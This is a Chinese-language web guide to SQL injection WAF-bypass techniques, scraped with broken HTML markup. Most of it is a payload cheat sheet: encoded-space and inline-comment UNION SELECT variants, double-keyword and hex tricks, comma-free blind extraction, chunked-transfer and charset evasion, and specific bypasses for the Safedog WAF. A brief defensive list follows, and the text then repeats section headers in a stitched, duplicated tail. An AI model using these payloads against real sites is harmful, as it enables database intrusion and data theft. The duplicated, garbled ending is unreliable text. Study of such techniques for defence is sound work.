SQL注入绕过技术全面指南<\/h1>

1. 空格绕过技术<\/h2>
在SQL注入中，空格是分隔关键字的重要字符，当空格被过滤时，可以使用以下替代方法：<\/p>

1.1 特殊字符替代空格<\/h3>

%20<\/code>：标准URL编码空格<\/li>
%a0<\/code>：不间断空格<\/li>
%09<\/code>：TAB键(水平制表符)<\/li>
%0a<\/code>：新建一行<\/li>
%0b<\/code>：TAB键(垂直制表符)<\/li>
%0c<\/code>：新的一页<\/li>

%0d<\/code>：回车<\/li>
<\/ul>
1.2 注释替代空格<\/h3>

\/**\/<\/code>：标准注释替代<\/li>
\/*!*\/<\/code>：内联注释，可包含版本号<\/li>
<\/ul>
示例：<\/p>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> \/*!union*\/\/*!select*\/<\/span>1<\/span>,2<\/span>,3<\/span>,4<\/span>;
<\/span><\/span><\/code><\/pre>1.3 函数生成空格<\/h3>
SELECT<\/span> CHAR(32<\/span>)column1 CHAR(32<\/span>)FROM<\/span> CHAR(32<\/span>)table1
<\/span><\/span><\/code><\/pre>2. 大小写绕过<\/h2>
利用SQL对关键字不区分大小写的特性：<\/p>

混合大小写：sEleCT<\/code>, UniOn<\/code><\/li>
双写关键字：SESELECTLECT<\/code><\/li>
<\/ul>
3. 浮点数绕过<\/h2>
利用浮点数表示绕过整数检测：<\/p>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>8<\/span>E0union select<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>;
<\/span><\/span>select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>8<\/span>.0<\/span>union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>;
<\/span><\/span><\/code><\/pre>4. NULL值绕过<\/h2>
使用NULL值替代实际数据：<\/p>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>\<\/span>Nunion select<\/span> 1<\/span>,2<\/span>,3<\/span>,\<\/span>N;
<\/span><\/span><\/code><\/pre>5. 引号绕过<\/h2>
5.1 单双引号互换<\/h3>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>"1"<\/span>;
<\/span><\/span><\/code><\/pre>5.2 十六进制编码<\/h3>
select<\/span> *<\/span> from<\/span> users where<\/span> username=<\/span>0<\/span>x61646D696E;
<\/span><\/span><\/code><\/pre>6. 添加库名绕过<\/h2>
使用[库名].[表名]<\/code>格式：<\/p>
select<\/span> *<\/span> from<\/span> users where<\/span> id=-<\/span>1<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span> from<\/span> moonsec.users;
<\/span><\/span><\/code><\/pre>7. DISTINCT关键字绕过<\/h2>
select<\/span> *<\/span> from<\/span> users where<\/span> id=-<\/span>1<\/span> union<\/span> distinct<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>,version<\/span>() from<\/span> users;
<\/span><\/span><\/code><\/pre>8. 反引号绕过<\/h2>
用于标识数据库、表名或字段名：<\/p>
SELECT<\/span> `<\/span>order<\/span>`<\/span> FROM<\/span> `<\/span>table<\/span>`<\/span>;
<\/span><\/span><\/code><\/pre>9. 脚本语言特性绕过<\/h2>
9.1 PHP参数覆盖<\/h3>
id=1%00&id=2 union select 1,2,3
<\/code><\/pre>
9.2 逗号绕过技术<\/h3>
9.2.1 Boolean注入<\/h4>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> 'm'<\/span>=<\/span>(select<\/span>(substr(database<\/span>() from<\/span> 1<\/span> for<\/span> 1<\/span>)));
<\/span><\/span><\/code><\/pre>9.2.2 JOIN关键字<\/h4>
select<\/span> *<\/span> from<\/span> users where<\/span> id=-<\/span>1<\/span> union<\/span> select<\/span> *<\/span> from<\/span> (select<\/span> 1<\/span>)a join<\/span> (select<\/span> 2<\/span>)b join<\/span>(select<\/span> 3<\/span>)c<\/span> join<\/span> (select<\/span> 4<\/span>)d;
<\/span><\/span><\/code><\/pre>9.2.3 LIKE模糊查询<\/h4>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> (select<\/span> user<\/span>() like<\/span> '%r%'<\/span>);
<\/span><\/span><\/code><\/pre>9.2.4 LIMIT OFFSET<\/h4>
select<\/span> *<\/span> from<\/span> users limit<\/span> 1<\/span> offset<\/span> 0<\/span>;
<\/span><\/span><\/code><\/pre>10. 逻辑运算符绕过<\/h2>

and<\/code> → &&<\/code><\/li>
or<\/code> → ||<\/code><\/li>
not<\/code> → !<\/code><\/li>
xor<\/code> → |<\/code><\/li>
<\/ul>
11. ASCII字符对比绕过<\/h2>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> ascii(substring<\/span>(user<\/span>(),1<\/span>,1<\/span>))=<\/span>114<\/span>;
<\/span><\/span><\/code><\/pre>12. 等号(=)绕过<\/h2>
12.1 使用大于小于<\/h3>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> ascii(substring<\/span>(user<\/span>(),1<\/span>,1<\/span>))><\/span>114<\/span> and<\/span> ascii(substring<\/span>(user<\/span>(),1<\/span>,1<\/span>))<<\/span>116<\/span>;
<\/span><\/span><\/code><\/pre>12.2 LIKE运算符<\/h3>
SELECT<\/span> *<\/span> FROM<\/span> pet WHERE<\/span> name LIKE<\/span> 'b%'<\/span>;
<\/span><\/span><\/code><\/pre>12.3 RLIKE\/REGEXP<\/h3>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> (select<\/span> substring<\/span>(user<\/span>(),1<\/span>,1<\/span>)rlike 'r'<\/span>);
<\/span><\/span><\/code><\/pre>13. 双关键词绕过<\/h2>
id=-<\/span>1<\/span>'UNIunionONSeLselectECT1,2,3--+
<\/span><\/span><\/span><\/code><\/pre>14. 编码绕过技术<\/h2>
14.1 二次编码绕过<\/h3>
%2520 → %20 → 空格
<\/code><\/pre>
14.2 Unicode编码<\/h3>
%u0020 → 空格
<\/code><\/pre>
14.3 HTTP数据编码<\/h3>
修改Content-Type的charset为服务器支持但WAF不支持的编码(如ibm037)<\/p>
15. 分块传输绕过<\/h2>
使用Transfer-Encoding: chunked拆分恶意负载<\/p>
16. 信任白名单绕过<\/h2>
利用WAF白名单中的目录或文件：<\/p>
a=\/admin.php&name=vince+&submit=1
<\/code><\/pre>
17. 静态文件绕过<\/h2>
利用jpg\/png\/gif\/css\/js等静态文件不被检测的特性：<\/p>
a=\/1.jpg&name=vince+&submit=1
<\/code><\/pre>
18. HTTP管道(Pipeline)绕过<\/h2>
修改Connection为keep-alive，分多个包发送payload<\/p>
19. multipart\/form-data绕过<\/h2>
使用multipart\/form-data编码方式传输数据<\/p>
20. ORDER BY绕过<\/h2>
使用INTO替代：<\/p>
select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> into<\/span> @<\/span>a,@<\/span>b,@<\/span>c<\/span>,@<\/span>d;
<\/span><\/span><\/code><\/pre>21. HTTP请求方式变换<\/h2>
GET\/POST互换或同时使用<\/p>
22. JSON\/XML绕过<\/h2>
使用application\/json或text\/xml格式提交<\/p>
23. 字符溢出绕过<\/h2>
使用大量填充字符：<\/p>
id=<\/span>1<\/span> and<\/span> (select1)=<\/span>(select<\/span> 0<\/span>xA*<\/span>1000<\/span>)\/*!union*\/\/*!select*\/<\/span>1<\/span>,user<\/span>()
<\/span><\/span><\/code><\/pre>24. 花括号绕过<\/h2>
select1,2<\/span> union<\/span> select<\/span> {<\/span>xxx 1<\/span>}<\/span>,user<\/span>();
<\/span><\/span><\/code><\/pre>25. ALL\/DISTINCT绕过<\/h2>
select1,2<\/span>from<\/span> users where<\/span> user_id=<\/span>1<\/span> union<\/span> DISTINCT<\/span> select1,2<\/span>
<\/span><\/span>select1,2<\/span>from<\/span> users where<\/span> user_id=<\/span>1<\/span> union<\/span> all<\/span> select1,2<\/span>
<\/span><\/span><\/code><\/pre>26. 换行混绕绕过<\/h2>
select<\/span> 1<\/span>,2<\/span> from<\/span> users union<\/span> \/* Asdf Asdf Asdf Asdf Asdf *\/<\/span> select<\/span> 1<\/span>,user<\/span>();
<\/span><\/span><\/code><\/pre>27. 特定WAF绕过技巧<\/h2>
27.1 IIS安全狗绕过<\/h3>
id=1+and+substring(@@version+from+1+for+1)=5--+
<\/code><\/pre>
27.2 字符型注入<\/h3>
name=vince'+and+substring((select+username+from+`users`+limit+1)+from+1+for+1)='a'--+
<\/code><\/pre>
28. 高级联合查询绕过<\/h2>
多种UNION SELECT变形：<\/p>
\/*!union*\/\/*!select*\/<\/span>1<\/span>,2<\/span>
<\/span><\/span>\/*!12345union*\/\/*!12345select*\/<\/span>1<\/span>,2<\/span>;
<\/span><\/span>%<\/span>0<\/span>aunion%<\/span>0<\/span>aselect1,2<\/span>
<\/span><\/span>--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
<\/span><\/span><\/span><\/code><\/pre>防御建议<\/h2>

使用参数化查询(预编译语句)<\/li>
实施最小权限原则<\/li>
输入验证和过滤<\/li>
使用Web应用防火墙(WAF)<\/li>
定期更新和修补系统<\/li>
禁用错误信息显示<\/li>
实施多层防御策略<\/li>
<\/ol>
本指南涵盖了当前主流的SQL注入绕过技术，安全人员应了解这些技术以更好地防御SQL注入攻击。<\/p>

SQL注入绕过技术全面指南<\/h1>

1. 空格绕过技术<\/h2> 在SQL注入中，空格是分隔关键字的重要字符，当空格被过滤时，可以使用以下替代方法：<\/p>

5. 引号绕过<\/h2>

9. 脚本语言特性绕过<\/h2>

9.2 逗号绕过技术<\/h3>

12. 等号(=)绕过<\/h2>

14. 编码绕过技术<\/h2>

14.3 HTTP数据编码<\/h3> 修改Content-Type的charset为服务器支持但WAF不支持的编码(如ibm037)<\/p>

15. 分块传输绕过<\/h2> 使用Transfer-Encoding: chunked拆分恶意负载<\/p>

18. HTTP管道(Pipeline)绕过<\/h2> 修改Connection为keep-alive，分多个包发送payload<\/p>

19. multipart\/form-data绕过<\/h2> 使用multipart\/form-data编码方式传输数据<\/p>

21. HTTP请求方式变换<\/h2> GET\/POST互换或同时使用<\/p>

22. JSON\/XML绕过<\/h2> 使用application\/json或text\/xml格式提交<\/p>

27. 特定WAF绕过技巧<\/h2>

1. 空格绕过技术<\/h2>
在SQL注入中，空格是分隔关键字的重要字符，当空格被过滤时，可以使用以下替代方法：<\/p>

14.3 HTTP数据编码<\/h3>
修改Content-Type的charset为服务器支持但WAF不支持的编码(如ibm037)<\/p>

15. 分块传输绕过<\/h2>
使用Transfer-Encoding: chunked拆分恶意负载<\/p>

18. HTTP管道(Pipeline)绕过<\/h2>
修改Connection为keep-alive，分多个包发送payload<\/p>

19. multipart\/form-data绕过<\/h2>
使用multipart\/form-data编码方式传输数据<\/p>

21. HTTP请求方式变换<\/h2>
GET\/POST互换或同时使用<\/p>

22. JSON\/XML绕过<\/h2>
使用application\/json或text\/xml格式提交<\/p>